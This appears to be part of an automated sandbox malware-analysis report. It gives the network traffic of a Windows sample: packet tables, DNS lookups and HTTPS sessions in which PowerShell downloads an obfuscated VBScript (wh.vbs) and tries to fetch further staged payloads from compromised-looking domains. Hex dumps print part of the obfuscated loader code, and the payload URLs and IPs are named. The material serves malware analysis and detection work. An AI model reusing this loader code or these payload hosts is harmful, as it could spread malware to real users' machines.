                                                                    Dec 5, 2024 10:40:04.849155903 CET49965443192.168.2.5184.171.244.231
                                                                    Dec 5, 2024 10:40:08.869862080 CET49981443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:40:08.869904041 CET44349981148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:40:08.869965076 CET49981443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:40:08.870234013 CET49981443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:40:08.870244980 CET44349981148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:40:10.269802094 CET44349981148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:40:10.270817995 CET49981443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:40:10.270831108 CET44349981148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:40:10.816262007 CET44349981148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:40:10.816456079 CET44349981148.251.114.233192.168.2.5
                                                                    Dec 5, 2024 10:40:10.816539049 CET49981443192.168.2.5148.251.114.233
                                                                    Dec 5, 2024 10:40:10.817239046 CET49981443192.168.2.5148.251.114.233

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 5, 2024 10:38:17.337166071 CET5899153192.168.2.51.1.1.1
                                                                    Dec 5, 2024 10:38:17.852596045 CET53589911.1.1.1192.168.2.5
                                                                    Dec 5, 2024 10:38:21.138468981 CET5469753192.168.2.51.1.1.1
                                                                    Dec 5, 2024 10:38:22.147492886 CET5469753192.168.2.51.1.1.1
                                                                    Dec 5, 2024 10:38:22.161328077 CET53546971.1.1.1192.168.2.5
                                                                    Dec 5, 2024 10:38:22.285103083 CET53546971.1.1.1192.168.2.5
                                                                    Dec 5, 2024 10:38:26.676711082 CET4967653192.168.2.51.1.1.1
                                                                    Dec 5, 2024 10:38:27.678716898 CET4967653192.168.2.51.1.1.1
                                                                    Dec 5, 2024 10:38:27.711107969 CET53496761.1.1.1192.168.2.5
                                                                    Dec 5, 2024 10:38:27.815964937 CET53496761.1.1.1192.168.2.5
                                                                    Dec 5, 2024 10:38:39.964658022 CET5013453192.168.2.51.1.1.1
                                                                    Dec 5, 2024 10:38:40.719299078 CET53501341.1.1.1192.168.2.5

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 5, 2024 10:38:17.337166071 CET192.168.2.51.1.1.10xf7cfStandard query (0)www.fornid.comA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:21.138468981 CET192.168.2.51.1.1.10x6bd4Standard query (0)www.pineappletech.aeA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:22.147492886 CET192.168.2.51.1.1.10x6bd4Standard query (0)www.pineappletech.aeA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:26.676711082 CET192.168.2.51.1.1.10x2d3cStandard query (0)www.erp-royal-crown.infoA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:27.678716898 CET192.168.2.51.1.1.10x2d3cStandard query (0)www.erp-royal-crown.infoA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:39.964658022 CET192.168.2.51.1.1.10x44ddStandard query (0)www.almrwad.comA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 5, 2024 10:38:17.852596045 CET1.1.1.1192.168.2.50xf7cfNo error (0)www.fornid.comfornid.comCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:17.852596045 CET1.1.1.1192.168.2.50xf7cfNo error (0)fornid.com93.95.216.175A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:22.161328077 CET1.1.1.1192.168.2.50x6bd4No error (0)www.pineappletech.ae91.193.42.13A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:22.285103083 CET1.1.1.1192.168.2.50x6bd4No error (0)www.pineappletech.ae91.193.42.13A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:27.711107969 CET1.1.1.1192.168.2.50x2d3cNo error (0)www.erp-royal-crown.infoerp-royal-crown.infoCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:27.711107969 CET1.1.1.1192.168.2.50x2d3cNo error (0)erp-royal-crown.info148.251.114.233A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:27.815964937 CET1.1.1.1192.168.2.50x2d3cNo error (0)www.erp-royal-crown.infoerp-royal-crown.infoCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:27.815964937 CET1.1.1.1192.168.2.50x2d3cNo error (0)erp-royal-crown.info148.251.114.233A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:40.719299078 CET1.1.1.1192.168.2.50x44ddNo error (0)www.almrwad.comalmrwad.comCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 10:38:40.719299078 CET1.1.1.1192.168.2.50x44ddNo error (0)almrwad.com184.171.244.231A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • www.fornid.com
                                                                    • www.pineappletech.ae
                                                                    • www.erp-royal-crown.info
                                                                    • www.almrwad.com

                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.54970493.95.216.1754437164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:38:19 UTC116OUTGET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                    Host: www.fornid.com
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:38:20 UTC555INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 09:38:19 GMT
                                                                    Server: Apache
                                                                    P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
                                                                    Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyiskbISKkTmQkL1lNdBd32jy%2F4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZBMCBalW%2FAKWOU2%2FeAFzTBk%3D000075; expires=Wed, 25-Dec-2024 09:38:19 GMT; Max-Age=1728000; path=/; domain=www.fornid.com; httponly
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Vary: Accept-Encoding
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=utf-8
                                                                    2024-12-05 09:38:20 UTC7637INData Raw: 31 31 65 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 20 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 69 65 37 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 69 65 38 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69
                                                                    Data Ascii: 11e50<!DOCTYPE HTML>...[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7 " lang="it"><![endif]-->...[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="it"><![endif]-->...[if IE 8]><html class="no-js lt-ie9 ie8" lang="it"><![endif]-->...[i
                                                                    2024-12-05 09:38:20 UTC138INData Raw: 2d 70 61 67 61 6d 65 6e 74 69 22 20 74 69 74 6c 65 3d 22 43 6f 6d 65 20 61 63 71 75 69 73 74 61 72 65 22 20 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 74 68 69 73 2e 68 72 65 66 29 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 43 6f 6d 65 20 61 63 71 75 69 73 74 61 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 09 09 0a 09 0a 09 3c 2f 75 6c 3e 0a 0a 3c 2f 64 69 76 3e 0a 0a 3c 21 2d 2d 20 2f 42
                                                                    Data Ascii: -pagamenti" title="Come acquistare" onclick="window.open(this.href);return false;">Come acquistare</a></li></ul></div>... /B
                                                                    2024-12-05 09:38:20 UTC8192INData Raw: 6c 6f 63 6b 20 6c 69 6e 6b 73 20 6d 6f 64 75 6c 65 20 2d 2d 3e 0a 0a 09 3c 21 2d 2d 20 4d 65 6e 75 20 2d 2d 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 74 6d 5f 74 6f 70 6d 65 6e 75 22 3e 0d 0a 09 09 3c 68 34 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 5f 62 6c 6f 63 6b 22 3e 4d 65 6e 75 3c 2f 68 34 3e 0d 0a 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 74 72 65 65 20 64 68 74 6d 6c 22 3e 0d 0a 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 34 2d 75 74 65 6e 73 69 6c 69 2d 70 65 72 2d 6c 2d 69 6e 64 75 73 74 72 69 61 2d 65 2d 6c 2d 65 64 69 6c 69 7a 69 61 22 20 74 69 74 6c 65 3d 22 55 74 65 6e 73 69 6c 69 20 70 65 72 20 6c 27 69 6e 64 75 73 74 72 69 61 20 65 20 6c 27 65
                                                                    Data Ascii: lock links module -->... Menu --><div id="tm_topmenu"><h4 class="title_block">Menu</h4><ul class="tree dhtml"><li class=""><a href="https://www.fornid.com/4-utensili-per-l-industria-e-l-edilizia" title="Utensili per l'industria e l'e
                                                                    2024-12-05 09:38:20 UTC8192INData Raw: 62 72 69 66 69 63 61 6e 74 65 22 20 74 69 74 6c 65 3d 22 4f 6c 69 6f 20 6c 75 62 72 69 66 69 63 61 6e 74 65 22 3e 4f 6c 69 6f 20 6c 75 62 72 69 66 69 63 61 6e 74 65 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 74 6d 5f 73 75 62 55 4c 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 32 2d 6f 6c 69 6f 2d 69 64 72 61 75 6c 69 63 6f 22 20 74 69 74 6c 65 3d 22 4f 6c 69 6f 20 69 64 72 61 75 6c 69 63 6f 20 49 53 4f 20 33 32 2c 20 34 36 20 65 20 36 38 22 3e 4f 6c 69 6f 20 69 64 72 61 75 6c 69 63 6f 20 49 53 4f 20 33 32 2c 20 34 36 20 65 20 36 38 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                                    Data Ascii: brificante" title="Olio lubrificante">Olio lubrificante</a><ul class="tm_subUL"><li class=""><a href="https://www.fornid.com/22-olio-idraulico" title="Olio idraulico ISO 32, 46 e 68">Olio idraulico ISO 32, 46 e 68</a></li><li class=""><a href="https://www
                                                                    2024-12-05 09:38:20 UTC8192INData Raw: 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 30 35 2d 72 61 63 63 6f 72 64 65 72 69 61 2d 69 6e 2d 6f 74 74 6f 6e 65 2d 75 73 6f 2d 63 69 76 69 6c 65 2d 69 6e 64 75 73 74 72 69 61 6c 65 2d 65 2d 70 65 72 2d 70 6f 6d 70 65 2d 69 64 72 61 75 6c 69 63 68 65 22 20 74 69 74 6c 65 3d 22 52 61 63 63 6f 72 64 65 72 69 61 20 69 6e 20 6f 74 74 6f 6e 65 20 75 73 6f 20 63 69 76 69 6c 65 2c 20 69 6e 64 75 73 74 72 69 61 6c 65 20 65 20 70 65 72 20 70 6f 6d 70 65 20 69 64 72 61 75 6c 69 63 68 65 22 3e 52 61 63 63 6f 72 64 65 72 69 61 20 69 6e 20 6f 74 74 6f 6e 65 20 75 73 6f 20 63 69 76 69 6c 65 2c 20 69 6e 64 75 73 74 72 69 61 6c 65 20 65 20 70 65 72 20 70 6f 6d 70 65 20 69
                                                                    Data Ascii: ><li class=""><a href="https://www.fornid.com/305-raccorderia-in-ottone-uso-civile-industriale-e-per-pompe-idrauliche" title="Raccorderia in ottone uso civile, industriale e per pompe idrauliche">Raccorderia in ottone uso civile, industriale e per pompe i
                                                                    2024-12-05 09:38:20 UTC8192INData Raw: 6d 2f 32 35 32 2d 70 6f 6d 70 65 2d 70 65 72 2d 74 72 61 74 74 6f 72 69 22 20 74 69 74 6c 65 3d 22 50 6f 6d 70 65 20 70 65 72 20 74 72 61 74 74 6f 72 69 22 3e 50 6f 6d 70 65 20 70 65 72 20 74 72 61 74 74 6f 72 69 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 35 33 2d 70 6f 6d 70 65 2d 70 65 72 2d 66 6f 67 6e 61 74 75 72 61 22 20 74 69 74 6c 65 3d 22 50 6f 6d 70 65 20 70 65 72 20 66 6f 67 6e 61 74 75 72 61 22 3e 50 6f 6d 70 65 20 70 65 72 20 66 6f 67 6e 61 74 75 72 61 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 74 6d 5f 73 75 62 55 4c 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                                    Data Ascii: m/252-pompe-per-trattori" title="Pompe per trattori">Pompe per trattori</a></li><li class=""><a href="https://www.fornid.com/253-pompe-per-fognatura" title="Pompe per fognatura">Pompe per fognatura</a><ul class="tm_subUL"><li class=""><a href="https://www
                                                                    2024-12-05 09:38:20 UTC8192INData Raw: 61 72 72 65 6c 6c 69 20 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 22 3e 43 61 72 72 65 6c 6c 69 20 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 32 35 2d 6d 6f 74 6f 70 6f 6d 70 65 2d 69 72 72 6f 72 61 74 72 69 63 69 22 20 74 69 74 6c 65 3d 22 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 22 3e 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73
                                                                    Data Ascii: arrelli per irrorazione con motopompe">Carrelli per irrorazione con motopompe</a></li><li class=""><a href="https://www.fornid.com/225-motopompe-irroratrici" title="Motopompe irroratrici">Motopompe irroratrici</a></li></ul></li><li class=""><a href="https
                                                                    2024-12-05 09:38:20 UTC8192INData Raw: 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 09 3c 64 69 76 3e 0a 0a 09 09 09 09 09 09 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 64 61 72 6b 22 3e 54 6f 74 61 6c 65 3c 2f 73 74 72 6f 6e 67 3e 0a 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 70 72 6f 64 75 63 74 5f 70 72 69 63 65 22 3e 3c 2f 73 70 61 6e 3e 0a 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 63 61 72 74 20 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 6d 64 2d 36 22 3e 0a 0a 09 09 09 09 3c 70 3e 0a 0a 09 09 09 09 09 3c 21 2d 2d 20 50 6c 75 72 61 6c 20 43 61 73 65 20 5b 62 6f 74 68 20 63 61 73 65 73 20 61 72 65 20 6e
                                                                    Data Ascii: </div><div><strong class="dark">Totale</strong><span id="layer_cart_product_price"></span></div></div></div><div class="layer_cart_cart col-xs-12 col-md-6"><p>... Plural Case [both cases are n
                                                                    2024-12-05 09:38:20 UTC8192INData Raw: 73 70 61 6c 6c 65 74 2d 65 6c 65 74 74 72 6f 6e 69 63 69 2d 6c 69 66 74 65 72 2d 62 79 2d 70 72 61 6d 61 63 22 20 74 69 74 6c 65 3d 22 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 22 3e 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 33 39 2d 64 69 73 74 72 69 62 75 7a 69 6f 6e 65 2d 67 72 61 73 73 6f 2d 6d 65 63 6c 75 62 65 22 20 74 69 74 6c 65 3d 22 44 49 53 54 52 49 42 55 5a 49 4f 4e 45 20 47 52 41 53 53 4f 20
                                                                    Data Ascii: spallet-elettronici-lifter-by-pramac" title="Transpallet elettronici LIFTER BY PRAMAC">Transpallet elettronici LIFTER BY PRAMAC</a></li></ul></li><li class=""><a href="https://www.fornid.com/339-distribuzione-grasso-meclube" title="DISTRIBUZIONE GRASSO
                                                                    2024-12-05 09:38:20 UTC416INData Raw: 46 46 50 31 20 2d 20 46 46 50 32 20 2d 20 46 46 50 33 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 39 30 2d 6d 61 73 63 68 65 72 65 2d 70 65 72 2d 73 61 6c 64 61 74 75 72 61 22 20 74 69 74 6c 65 3d 22 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 22 3e 4d 61 73 63 68 65 72 65 20 70 65 72 20 73 61 6c 64 61 74 75 72 61 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 31 34 2d 73 63 61 72 70 65 2d 61 6e 74 69 6e 66 6f 72 74 75 6e 69 73 74 69 63 68 65 2d 65 2d 73 74 69 76 61 6c 65 2d 64 61 2d 6c 61 76 6f 72 6f
                                                                    Data Ascii: FFP1 - FFP2 - FFP3</a></li><li class=""><a href="https://www.fornid.com/90-maschere-per-saldatura" title="Maschere per saldatura">Maschere per saldatura</a></li><li class=""><a href="https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.54971191.193.42.134437164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:38:23 UTC79OUTGET /ov/wh.vbs HTTP/1.1
                                                                    Host: www.pineappletech.ae
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:38:24 UTC232INHTTP/1.1 200 OK
                                                                    Connection: close
                                                                    content-type: text/vbscript
                                                                    last-modified: Wed, 26 Jun 2024 05:34:18 GMT
                                                                    accept-ranges: bytes
                                                                    content-length: 29620
                                                                    date: Thu, 05 Dec 2024 09:38:23 GMT
                                                                    server: LiteSpeed
                                                                    vary: User-Agent
                                                                    2024-12-05 09:38:24 UTC1136INData Raw: 0d 0a 0d 0a 0d 0a 46 75 6e 63 74 69 6f 6e 20 4d 61 63 75 6c 6f 73 65 32 34 32 28 52 65 6b 74 6f 72 61 74 29 0d 0a 0d 0a 0d 0a 50 75 62 6c 69 6b 75 6d 6d 65 74 62 61 74 66 6f 77 6c 20 3d 20 4d 69 64 28 4d 69 64 42 28 43 6f 6d 6d 61 6e 64 2c 20 34 34 2c 20 32 31 33 29 2c 32 31 2c 32 35 29 0d 0a 0d 0a 4d 61 63 75 6c 6f 73 65 32 34 32 20 3d 20 43 68 72 57 28 52 65 6b 74 6f 72 61 74 29 0d 0a 0d 0a 4f 70 73 6b 72 65 6b 6e 69 76 73 70 6c 69 64 20 3d 20 43 6f 6d 6d 61 6e 64 20 0d 0a 0d 0a 0d 0a 45 6e 64 20 46 75 6e 63 74 69 6f 6e 20 0d 0a 0d 0a 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72 6e 65 20 3d 20 4c 65 6e 42 28 22 53 61 72 64 69 6e 69 65 72 65 6e 22 29 20 0d 0a 65 6c 65 6b 74 72 6f 69 6e 67 65 6e 69 72 65 72 6e 65 20 3d 20 65 6c 65 6b 74 72 6f 69 6e 67
                                                                    Data Ascii: Function Maculose242(Rektorat)Publikummetbatfowl = Mid(MidB(Command, 44, 213),21,25)Maculose242 = ChrW(Rektorat)Opskreknivsplid = Command End Function elektroingenirerne = LenB("Sardinieren") elektroingenirerne = elektroing
                                                                    2024-12-05 09:38:24 UTC14994INData Raw: 72 69 76 61 74 65 20 43 6f 6e 73 74 20 54 61 70 65 74 69 20 3d 20 22 44 65 6e 69 61 62 6c 65 20 64 61 74 61 73 74 79 72 20 75 6e 63 65 6c 69 62 61 74 65 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4e 6f 61 6f 72 64 65 74 73 20 3d 20 2d 34 35 30 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4f 73 74 65 6d 61 64 20 3d 20 26 48 37 35 30 32 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 42 6f 74 72 79 6f 6d 79 63 65 73 31 34 31 20 3d 20 26 48 46 46 46 46 45 38 38 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 55 66 6f 72 64 72 61 67 65 6c 69 67 73 74 65 20 3d 20 26 48 35 41 36 35 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 52 65 76 65 72 73 6f 20 3d 20 26 48 45 39 34 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 61 61 74 73 20 3d
                                                                    Data Ascii: rivate Const Tapeti = "Deniable datastyr uncelibate"Private Const Noaordets = -4508Private Const Ostemad = &H7502Private Const Botryomyces141 = &HFFFFE888Private Const Ufordrageligste = &H5A65Private Const Reverso = &HE948Private Const Saats =
                                                                    2024-12-05 09:38:24 UTC13490INData Raw: 70 65 72 73 75 61 64 65 64 6e 65 73 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 53 6b 61 6b 73 70 69 6c 6c 65 72 65 6e 73 20 3d 20 31 37 34 38 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 47 6c 69 6e 73 65 6e 64 65 20 3d 20 2d 34 32 34 35 34 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 45 76 61 73 69 76 65 6e 65 73 73 20 3d 20 26 48 34 38 43 45 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 4c 65 70 74 6f 72 72 68 69 6e 69 73 6d 31 35 35 20 3d 20 2d 31 38 39 31 38 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 50 72 6f 67 72 61 6d 6b 6f 6d 70 6c 65 6b 73 65 74 20 3d 20 22 43 6f 6e 67 72 65 73 73 65 73 20 6d 6f 6c 69 6d 65 6e 20 6e 67 73 74 65 6c 69 67 65 72 65 73 22 0d 0a 50 72 69 76 61 74 65 20 43 6f 6e 73 74 20 43 69 67 61 72 6b 61
                                                                    Data Ascii: persuadedness"Private Const Skakspillerens = 17488Private Const Glinsende = -42454Private Const Evasiveness = &H48CEPrivate Const Leptorrhinism155 = -18918Private Const Programkomplekset = "Congresses molimen ngsteligeres"Private Const Cigarka


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.549733148.251.114.2334432956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 09:38:29 UTC184OUTGET /wh/Sarothrum.jpb HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: www.erp-royal-crown.info
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 09:38:29 UTC416INHTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Thu, 05 Dec 2024 09:38:29 GMT
                                                                    server: LiteSpeed
                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                    2024-12-05 09:38:29 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
